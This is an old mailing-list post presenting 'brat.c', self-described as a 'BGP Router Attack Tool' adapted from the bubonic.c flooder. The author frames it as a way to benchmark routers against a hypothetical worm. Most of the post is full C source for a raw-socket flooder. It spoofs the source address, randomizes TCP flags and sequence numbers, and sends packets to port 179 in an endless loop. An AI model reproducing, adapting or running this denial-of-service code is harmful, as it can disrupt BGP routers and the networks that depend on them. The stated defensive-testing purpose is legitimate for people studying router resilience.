brat.c = Possible BGP latency generator

["J. Oquendo" <routesec () engineer com>]

I started doing some reading/catching up on networking, and decided
to modify an old tool to tinker with BGP a bit. I was hoping I could
benchmark some stuff to avoid a possible nightmare should someone
decide to make a worm that attacked routers `ala` SoBigf/MSBlast.

The thought I had was: "What if someone took their time and made
something like that, that took time to install the necessary
includes to compile a packet spoofing random generating, router
attack tool. So this is what I came up with. Now I could test it
on machines running zebra at home, but I don't have enough routers
to make the necessary configurations for the scenario at:
http://www.politrix.org/segment/brat.txt

Reasons why I decided to tinker with this? Suppose someone does
decide to create something that stupid (that attacks routers)
what could be done being that nothing like this has ever been
done on this scale (worm + dos + bgp routers with specific packet
info), and it would be helpful to all admins and vendors if
they could find probs beforehand and fix things up.

Sure some will state, there's no prob with *X* ... Until something
comes along and bites them in the *packet* so for those who have
the equipment and the time for testing here's a concept
program for you...


/*
 *
 * brat.c (modified bubonic.c)
 * SoBigF concept: worm + BGP = backbone nightmare
 * wii sil @ efnet || sil @ disgraced . org
 * works find under FreeBSD 4.7-RELEASE-p3
 * OSX Linux (Slackware) NetBSD OpenBSD
 * Shouts to Spikeman Azrael MZA pseud jhh brianh
 * and everyone else I asked to test with me
 * #unixgods <h4x0rjeet0> is this channel being sniffed?
 *
*/


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <strings.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>

#ifndef __USE_BSD
#define __USE_BSD

#endif

#ifndef __FAVOR_BSD

#define __FAVOR_BSD

#endif

#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>

#ifdef LINUX
#define FIX(x)  htons(x)

#else

#define FIX(x)  (x)
#endif

struct ip_hdr {
    u_int       ip_hl:4,                
                ip_v:4;                 
    u_char      ip_tos;                 
    u_short     ip_len;                 
    u_short     ip_id;                  
    u_short     ip_off;                 
    u_char      ip_ttl;                 
    u_char      ip_p;                   
    u_short     ip_sum;                 
    u_long      saddr, daddr;           
};

struct tcp_hdr {
    u_short     th_sport;               
    u_short     th_dport;               
    u_long      th_seq;                 
    u_long      th_syn;
    u_int       th_x2:4,
                th_off:4;
    u_char      th_flags;               
    u_short     th_win;                 
    u_short     th_sum;                 
    u_short     th_urp;                 
};

struct tcpopt_hdr {
    u_char  type;                       
    u_char  len;                        
    u_short value;                      
};

struct pseudo_hdr {                     
    u_long saddr, daddr;                
    u_char mbz, ptcl;                   
    u_short tcpl;                       
};

struct packet {
    struct ip/*_hdr*/ ip;
    struct tcphdr tcp;
};

struct cksum {
    struct pseudo_hdr pseudo;
    struct tcphdr tcp;
};

struct packet packet;
struct cksum cksum;
struct sockaddr_in s_in;
u_short bgport, bgsize, pps;
u_long radd;
u_long sradd;
int sock;

void usage(char *progname)
{
    fprintf(stderr, "Usage: %s <dst> <src> <size> <number>\n", progname);
    fprintf(stderr, "Ports are set to send and receive on port 179\n");
    fprintf(stderr, "dst:\tDestination Address\n");
    fprintf(stderr, "src:\tSource Address\n");
    fprintf(stderr, "size:\tSize of packet which should be no larger than 1024 should allow for xtra header info thru 
routes\n");
    fprintf(stderr, "num:\tpackets\n\n");
    exit(1);
}

inline u_short in_cksum(u_short *addr, int len)
{
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;
     while (nleft > 1)  {
         sum += *w++;
         nleft -= 2;
     }
     if (nleft == 1) {
         *(u_char *)(&answer) = *(u_char *) w;
         sum += answer;
     }
     sum = (sum >> 16) + (sum & 0xffff);
     sum += (sum >> 16);               
     answer = ~sum;                  
     return(answer);
}

u_long lookup(char *hostname)
{
    struct hostent *hp;

    if ((hp = gethostbyname(hostname)) == NULL) {
       fprintf(stderr, "Could not resolve %s fucknut\n", hostname);
       exit(1);
    }

    return *(u_long *)hp->h_addr;
}


void flooder(void)
{
    struct timespec ts;
    int i;


    memset(&packet, 0, sizeof(packet));

    ts.tv_sec                   = 0;
    ts.tv_nsec                  = 100;

    packet.ip.ip_hl             = 5;
    packet.ip.ip_v              = 4;
    packet.ip.ip_p              = IPPROTO_TCP;
    packet.ip.ip_tos            = 0;                    /* could have set to random and let that find something */
    packet.ip.ip_id             = radd;
    packet.ip.ip_len            = FIX(sizeof(packet));
    packet.ip.ip_off            = random();
    packet.ip.ip_ttl            = 255;
    packet.ip.ip_dst.s_addr     = radd;

    packet.tcp.th_flags         = 0;
    packet.tcp.th_win           = 65535;
    packet.tcp.th_seq           = random();
    packet.tcp.th_ack           = 0;
    packet.tcp.th_off           = 0; 
    packet.tcp.th_urp           = 0;
    packet.tcp.th_dport         = 179;
    cksum.pseudo.daddr          = sradd;
    cksum.pseudo.mbz            = 0;
    cksum.pseudo.ptcl           = IPPROTO_TCP;
    cksum.pseudo.tcpl           = random();

    s_in.sin_family             = AF_INET;
    s_in.sin_addr.s_addr        = sradd;
    s_in.sin_port               = 179;

    for(i=0;;++i) {
    if( !(i&31337) ) {
        packet.tcp.th_sport = 179;
        cksum.pseudo.saddr = packet.ip.ip_src.s_addr = sradd;
        packet.tcp.th_flags = random();
        packet.tcp.th_ack   = random();

    }
    else {
        packet.tcp.th_flags = rand();
        packet.tcp.th_ack = rand();
    }
       ++packet.ip.ip_id;
       /*++packet.tcp.th_sport*/;
       ++packet.tcp.th_seq;

       if (!bgport)
          s_in.sin_port = packet.tcp.th_dport = 179;

       packet.ip.ip_sum         = 0;
       packet.tcp.th_sum        = 0;

       cksum.tcp                = packet.tcp;

       packet.ip.ip_sum         = in_cksum((void *)&packet.ip, 20);
       packet.tcp.th_sum        = in_cksum((void *)&cksum, sizeof(cksum));

       if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in)) < 0);

    }
}

int main(int argc, char *argv[])
{
    int on = 1;

    printf("brat.c -- BGP Router Attack Tool\n");

    if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
       perror("socket");
       exit(1);
    }

    setgid(getgid()); setuid(getuid());

    if (argc < 4)
       usage(argv[0]);

    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0)

{
       perror("setsockopt");
       exit(1);

    }

    srand((time(NULL) ^ getpid()) + getppid());

    printf("\nFinding host\n"); fflush(stdout);

    radd        = lookup(argv[1]);
    bgport      = atoi(argv[3]);
    bgsize      = atoi(argv[4]);
    sradd       = lookup(argv[2]);
    printf("Silly rabbit Politrix are for kids\n");

    flooder();

    return 0;
}




=================================================
J. Oquendo
rsvp: segment ... antioffline . com
PGP Fingerprint
39A7 24C6 A9A0 6C67 96CA 0302 F1D3 2420 851E E3D0

http://www.politrix.org
http://www.antioffline.com
=================================================


-- 
__________________________________________________________
Sign-up for your own personalized E-mail at Mail.com
http://www.mail.com/?sr=signup

CareerBuilder.com has over 400,000 jobs. Be smarter about your job search
http://corp.mail.com/careers